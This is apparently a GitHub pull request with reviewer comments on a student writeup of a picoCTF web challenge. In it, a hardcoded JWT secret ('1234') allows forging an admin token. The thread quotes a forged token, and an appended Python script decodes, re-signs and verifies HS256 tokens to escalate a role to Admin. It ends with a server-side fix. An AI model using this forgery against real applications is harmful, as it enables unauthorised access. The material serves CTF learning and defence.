Report 6 - Flora - picoCTF Java Code Analysis!?! #92
Open
florayq wants to merge 6 commits into CUCTF:main from
Conversation
mmstoic (Contributor) suggested changes on May 1, 2026 and left a comment:
Overall great writeup! Just address the comments and you'll be good!
> ## Context & Vulnerability
> This code creates an extensive reading application where a user can read pdfs/books that they are given the jurisdiction to access. According to the challenge description, we need to read the 'Flag' book, which is only accessible by a user with admin authority, whereas the user account provided to us only has the free tier authority.
>
> In the security folder of the challenge, specifically SecretGenerator.java, we have the following code:
Contributor:
we HAVE the following code:
> ```java
>     return "1234";
> }
> ```
> This is clearly a security concern as JWT (JSON Web Tokens) depends on this generateRandomString function for its secret key.
Contributor:
Why are we concerned about secret keys? Why are we talking about JWT? Explain the relevance to the challenge context!
> ## Exploitation
> The JWT auth-token and token-payload values can be found under Application > Local Storage in the browser's Inspect tool. Using the website jwt.io (JWT Debugger), one can decode this string:
Contributor:
An image of this could be nice!
> ```
> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiQWRtaW4iLCJpc3MiOiJib29rc2hlbGYiLCJleHAiOjE3NzgwMjIwNjksImlhdCI6MTc3NzQxNzI2OSwidXNlcklkIjoyLCJlbWFpbCI6InVzZXIifQ.fh9qdjkyYO50o_Vfri7LsvdhSvSuqpOF9NEd5W5Ouyc
> ```
>
> we can replace the previous auth-token and token-payload.
Contributor:
Maybe an image of how you replaced the value?
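The steps the writeup describes (decode the captured token, change `role` to `Admin`, re-sign it with the hardcoded secret, verify it the way the server would) as one worked example. This is added illustration, not code from the writeup or from the picoCTF challenge; it uses only the Python standard library rather than a JWT library so it runs offline. The header and payload are the ones quoted in the writeup; the secret `"1234"` is the value quoted from SecretGenerator.java; the "Free" role value used for the constructed free-tier token is an assumption (the challenge's real role string for the free tier is not shown on the page).

```python
import base64
import hashlib
import hmac
import json

# Hardcoded secret quoted from the challenge's SecretGenerator.java.
WEAK_SECRET = "1234"

# The forged token quoted in the writeup (header.payload.signature).
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJyb2xlIjoiQWRtaW4iLCJpc3MiOiJib29rc2hlbGYiLCJleHAiOjE3NzgwMjIwNjksImlhdCI6"
    "MTc3NzQxNzI2OSwidXNlcklkIjoyLCJlbWFpbCI6InVzZXIifQ."
    "fh9qdjkyYO50o_Vfri7LsvdhSvSuqpOF9NEd5W5Ouyc"
)


def b64url_encode(raw: bytes) -> str:
    """Base64url without '=' padding, as JWS requires (RFC 7515)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding that JWTs strip, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token: str) -> tuple[dict, dict]:
    """What jwt.io shows: header and payload, with no signature check."""
    header_seg, payload_seg, _sig_seg = token.split(".")
    return (json.loads(b64url_decode(header_seg)),
            json.loads(b64url_decode(payload_seg)))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Mint an HS256 JWT. Compact JSON (no spaces) matches jwt.io's encoding."""
    header_seg = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    payload_seg = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_seg}.{payload_seg}".encode("ascii")
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header_seg}.{payload_seg}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """Server-side check: recompute the HMAC over header.payload, compare in constant time."""
    header_seg, payload_seg, sig_seg = token.split(".")
    signing_input = f"{header_seg}.{payload_seg}".encode("ascii")
    expected = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_seg))


def forge_admin_token(token: str, secret: str) -> str:
    """Take a captured token, overwrite role with Admin, re-sign with the known secret.

    Updating an existing key keeps its position, so the payload keeps the
    original key order and re-encodes byte-for-byte the same apart from the role.
    """
    header, payload = decode_unverified(token)
    payload = dict(payload, role="Admin")
    return sign_hs256(header, payload, secret)


# Constructed free-tier token standing in for the one the challenge hands out
# after login; "Free" as the role string is an assumption.
FREE_TIER_TOKEN = sign_hs256(
    {"typ": "JWT", "alg": "HS256"},
    {"role": "Free", "iss": "bookshelf", "exp": 1778022069,
     "iat": 1777417269, "userId": 2, "email": "user"},
    WEAK_SECRET,
)

if __name__ == "__main__":
    print("captured:", decode_unverified(FREE_TIER_TOKEN)[1])
    forged = forge_admin_token(FREE_TIER_TOKEN, WEAK_SECRET)
    print("forged:  ", decode_unverified(forged)[1])
    print("verifies with '1234'?", verify_hs256(forged, WEAK_SECRET))
```

Paste the value returned by `forge_admin_token` over `auth-token` in Local Storage exactly as the writeup does. `verify_hs256(PAGE_TOKEN, "1234")` is the one-line check that the token quoted above really was signed with the hardcoded secret. The fix on the server side is to replace the constant with a secret drawn from `java.security.SecureRandom` of at least 256 bits and loaded from configuration, so that no token can be minted without it.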
Flora's sixth writeup - web challenge from picoCTF